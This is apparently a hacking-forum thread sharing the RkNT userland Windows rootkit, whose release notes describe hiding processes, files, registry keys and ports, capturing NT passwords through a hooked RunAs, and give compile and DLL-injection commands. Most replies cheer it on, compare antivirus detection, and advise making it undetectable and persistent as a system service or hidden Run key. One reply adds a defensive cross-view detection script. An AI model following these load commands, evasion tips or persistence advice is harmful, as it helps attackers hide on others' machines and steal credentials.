Redkod Rootkit V1.0
Alexander01
CODE
|=----------=[ RkNT 1.0 : The Real NT Ring3 Infection ]=-----------=|
|=-----------------------------------------------------------------=|
|=------------=[ R-e-D of RedKod <r-e-d@redkod.com> ]=-------------=|


                              ,        ,
                             /(        )`
                             \ \___   / |
                             /- _  `-/  '
                            (/\/ \ \   /\
                            / /   | `    \
                            O O   ) /    |
                            `-^--'`<     '
                           (_.)  _  )   /
                            `.___/`    /
                              `-----' /
                 <----.     __ / __   \
R 0 0 T K I T   <----|=====O)))==) \) /====
                 <----'    `--' `.__,' \
                              |        |
                               \       /
                          ______( (_  / \______
                        ,'  ,-----'   |        \
                        `--{__________)        \/


This rootkit can not only hide processes, files, directories, registry keys or connections,
but also retrieve NT passwords or forbid deletion of misc files, from Windows Explorer or
from the MS-DOS command line (cmd.exe). Files and directories are even hidden from those two
Windows tools. They're also invisible to tlist.exe and WinTask PRO.

About connections, you can note that every port number over 65400 and under 65499 can't be seen
within netstat.exe. ;]

You can retrieve NT passwords by using the RunAs feature. The rootkit hooks
the function to catch the given password. The password list is available in the file "%systemrootdir%\winini.sys".

Very important: this rootkit runs completely in USERLAND (RING3); no kernel module is needed ;].
This type of rootkit is more robust and is not detected by current antivirus.

To Compile RkNTLoad:
cd RkNTLoad
nmake

To load the rootkit (take care to use the full path to the rootkit binary):
c:\RkNT>RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -l
[*] explorer.exe => PID [1196]
[*] DLL: c:\RkNT\RkNT.dll
[*] Injection de la DLL.
=> Injection de la DLL effectuée avec succès.

Once the rootkit is running, every process, file, directory and registry key
whose name begins with '_' (underscore) is hidden!

You can check whether it's running with this command:
C:\RkNT>RkNTLoad -p explorer.exe -m | find "RkNT"
0x00B60000      c:\RkNT\RkNT.dll

If you want to unload the rootkit, just proceed like this:
C:\RkNT>RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -u
[*] explorer.exe => PID [1196]
[*] Récupération d'un handle sur la DLL chargée.
=> DLL trouvée à l'adresse 0x00B60000.
[*] Déchargement de la DLL en cours...
=> DLL déchargée avec succès.

For remarks or questions you can contact me at r-e-d[at]redkod.com or get me on
the RedKod forum: http://www.redkod.com/phorum/

--
R-e-D, RedKod Team
r-e-d@redkod.com
http://www.redkod.com/
http://r-e-d.redkod.com/
GnuPG v1.0.6 (GNU/Linux)  ID 0x4D572372


Use it for your str0's against those aggressive admins of these days! AND those F*KKING admins with rootkit detectors!
enjoy peeps
Tyrano
looks like it has some great features. now, how do we detect it?
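A defender-side cross-view check for the hiding behaviour described in the release notes above (names starting with '_', local ports 65400-65499 filtered from netstat). This is an added example, not code from the thread or from the RkNT project; the netstat lines and directory listings are constructed, and the "trusted" view is assumed to come from an enumeration the rootkit's userland hooks do not touch.

```python
"""Cross-view detection for a userland rootkit that filters tool output.

RkNT (per the thread) hides names starting with '_' and local ports
65400-65499 by hooking the enumerating tools. Only the hooked tool's view is
filtered, so diffing it against an unhooked view of the same system (a
kernel-side enumeration, or a listing taken from a clean boot) exposes the
hidden entries.
"""
import re

HIDDEN_PORT_RANGE = range(65400, 65500)  # 65400..65499, as stated in the README
HIDDEN_NAME_PREFIX = "_"

# Matches "  TCP    0.0.0.0:135   0.0.0.0:0   LISTENING"; header lines do not.
_NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s", re.IGNORECASE)


def local_ports(netstat_lines):
    """Local port numbers from netstat-style lines, skipping non-matching lines."""
    return {int(m.group(3)) for m in map(_NETSTAT_RE.match, netstat_lines) if m}


def hidden_ports(hooked, trusted):
    """{port: in_rknt_range} for ports present only in the trusted view."""
    missing = local_ports(trusted) - local_ports(hooked)
    return {p: p in HIDDEN_PORT_RANGE for p in sorted(missing)}


def hidden_names(hooked, trusted):
    """{name: starts_with_underscore} for names present only in the trusted view."""
    missing = set(trusted) - set(hooked)
    return {n: n.startswith(HIDDEN_NAME_PREFIX) for n in sorted(missing)}


# Constructed sample views; not captured from a real host.
NETSTAT_HOOKED = [
    "  Proto  Local Address          Foreign Address        State",
    "  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING",
    "  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING",
]
NETSTAT_TRUSTED = NETSTAT_HOOKED + [
    "  TCP    0.0.0.0:65432          0.0.0.0:0              LISTENING",
    "  UDP    0.0.0.0:65450          *:*",
]
DIR_HOOKED = ["Program Files", "WINDOWS", "RkNT"]
DIR_TRUSTED = DIR_HOOKED + ["_hidden", "_logs"]

if __name__ == "__main__":
    print("hidden ports:", hidden_ports(NETSTAT_HOOKED, NETSTAT_TRUSTED))
    print("hidden names:", hidden_names(DIR_HOOKED, DIR_TRUSTED))
```

A discrepancy whose port falls outside 65400-65499, or whose name lacks the underscore, is still a discrepancy worth investigating; the flags only tell you whether it matches this particular rootkit's stated rules.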
popo0421
Thanks for sharing this rootkit! And tested it, it works ok!
shiz
F-Prot antivirus detects it right away upon starting the download
shiz
oops, double-posted by accident..
Lanig
detected by KAV too...
but it's open source, won't be hard making it totally undetectable
jhd
thx for the share
Killahbee
interesting, lemme see
h3llraz0r
looks great, thanks for the rootkit! detected by F-Secure also.
Venom
Don't be surprised.. Not detected by McAfee as of now.


Can someone plz translate the comments in the code to English?
jpno5
has any1 got this 2 work? i compiled it ok and ran it. the dll loads but it's only folders and files it will hide, i can still view the processes and regkeys and c the connection in netstat
blahplok
thanks for sharing this rk, can anyone tell me where i can find ms_blaster source code?
kenshin_efx
hummmm thanks a lot for sharing your toolz man, i really appreciate that.
jockel
nice one ..
thanks 4 distributing the source along with it...
globey
it's a nice r00tkit dude.
tnx for that.
tibbar
well that's very useful. thanx.

btw use alternative compilers to make it undetected
Mux99
Hey nice rootkit.... with really nice options.

I will try to mod the source...

Thx for sharing!
Jimbras
Thanks for this. gonna check it out
michael
k...thx for sharing
i tried it ..seems to work but i don't get the "underline" thing... " _ "
those should be invisible but when i do fport i can still see my blabla.exe running
so i should rename my blabla.exe to _blabla.exe...right?

am i doing something wrong here ?!!?
winxpdll
Awesome !
Thanks A LOT for distributing the source code...
Pls add this mod to simplify configuration:
CODE

#define HIDE_FILE_MASK '_'   /* char constant: filename[0] is a single char, so a "_" string literal would never compare equal */
.....
//mod :    if (filename[0] == '_')
if (filename[0] == HIDE_FILE_MASK)
 return TRUE;
......


...or something like this.
[Z]castor
thanx for sharing that nice rootkit
braini
QUOTE (michael @ Jul 13 2004, 02:17 PM)
k...thx for sharing
i tried it ..seems to work but i don't get the "underline" thing... " _ "
those should be invisible but when i do fport i can still see my blabla.exe running
so i should rename my blabla.exe to _blabla.exe...right?

am i doing something wrong here ?!!?

or u just modify the source and compile a dll for your needs / files....

shouldn't be that hard
predx
hey thanks for posting this rootkit!!!
macca
thank you for this new piece of s/w, i will have something diff to test out... much appreciated ..

also not reported by McAfee with latest definitions..
globey
do i have to run the rootkit with this command?
CODE
RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -l


or can i choose another -p?
like:
CODE
RkNTLoad -p GSO.exe -d c:\RkNT\RkNT.dll -l

or something like that?

and do i need to run the rootkit one time?
or every time the computer is rebooted?
strohunter
you can inject every process you want with the dll, it will be rootkited, but you will need to inject every process you want to be rootkited. it's not very useful, is it? ^^

if you inject explorer.exe, each newly created process will be automatically injected, since a process is created by explorer.exe calling CreateProcessW from kernel32.dll; this function has of course been hooked to automatically inject each newly created process.

and yes, you will need to run the rootkit each time the computer reboots ^^
globey
QUOTE (strohunter @ Jul 15 2004, 12:47 AM)
you can inject every process you want with the dll, it will be rootkited, but you will need to inject every process you want to be rootkited. it's not very useful, is it? ^^

if you inject explorer.exe, each newly created process will be automatically injected, since a process is created by explorer.exe calling CreateProcessW from kernel32.dll; this function has of course been hooked to automatically inject each newly created process.

and yes, you will need to run the rootkit each time the computer reboots ^^

so it's not the best rootkit :\

tnx for the answer
strohunter
QUOTE (globey @ Jul 15 2004, 10:16 AM)
so it's not the best rootkit :\

tnx for the answer

what?

injecting the dll in explorer.exe is the only (proper) way to have any process automatically rootkited with a pure userland rootkit (well, as far as i know...)
mine works in a very similar way.

about the *reboot* problem, it's just your job to make it a system service, or a "run regkey", and it's not quite difficult :s
braini
QUOTE (strohunter @ Jul 15 2004, 09:12 PM)

about the *reboot* problem, it's just your job to make it a system service, or a "run regkey", and it's not quite difficult :s

especially when u can hide registry keys ;]
strohunter
QUOTE (braini @ Jul 16 2004, 06:49 AM)
QUOTE (strohunter @ Jul 15 2004, 09:12 PM)

about the *reboot* problem, it's just your job to make it a system service, or a "run regkey", and it's not quite difficult :s

especially when u can hide registry keys ;]

yep ^__^ (but i prefer a system service, to give the rootkit/backdoor NT AUTHORITY rights)
espey
Big thx, this r00tkit is very useful :]
passi
Thanks for this one. Very interesting!
ANTITRUST
Following my remote test, it functions very well
Thank you for this rootkit!
DougieShiney
cheers for the source, the code will be easy to change to make a non-detectable version
t0bban
I read about this somewhere..
Seems to kick arse.. Is it alright? Cheers.
z73
this really looks like it kicks ass. Worth a try, thx for sharing
MxMx
hey peeps,

ive tried to compile it but how do i do this?..

ive tried it with the rknt.dll already in the package but still my folders beginning with _ are visible

plz helpzor me
Gargoyle
I started the rootkit and injected the explorer.exe,
but i can see folders or files with "_". The explorer.exe
seems not to be injected.

started with RkNTLoad -p explorer.exe -d RkNT.dll -l

what can the problem be?

many thx
tonikgin
QUOTE
You can retrieve NT passwords by using the RunAs feature. The rootkit hooks
the function to catch the given password. The password list is available in the file "%systemrootdir%\winini.sys".


the winini.sys file idea needs more thought put into it. the filename itself is suspicious, and also searching for the file itself could be used to detect the presence of this rootkit, since the filename is unique to this version.

im guessing this isn't an open source project?
crosis
wow nice
thx
Sigmatador
@Gargoyle
use the full path of the dll (ex: "c:\rknt.dll")

@tonikgin
GNU GPL, and well commented (in French)

@all
this release is a bunch of bugs, wait for the next release ^^
ivanchin99
guys.. can any1 guide me in making this rootkit undetectable???
click
Wow, thanks for the rootkit!

This should help me out quite a bit, especially with the source code. I am working on making a metasploit payload set that includes rootkits, and a non-kernel-driver rootkit would be perfect!

Thanks for the excellent post
elbarto95
thanks for sharing


rgds
ivanchin99
guys.. i need some guidance here..
how do i make it err unique, undetectable..?
is it by disassembling it and reassembling it??
do i need programming skills for this?

im new to this kind of thing..
devil666
Thanx for the rootkit...

Will have a try

{$ fireburn $}
for me this rk is not so bad but hxdef is really better!!!
for many things, like the disk size modification, and the possibility to hide what we want, not only everything beginning with _

because many exe aren't hex-editable, and so we can't modify their service name...
belgther
but a rootkit means nothing if there's no shell server or sth. like that... or how does it work?
mogwai
interesting...
miam miam
thanks for this soft :]
perky
Thanks, Very good ! :-)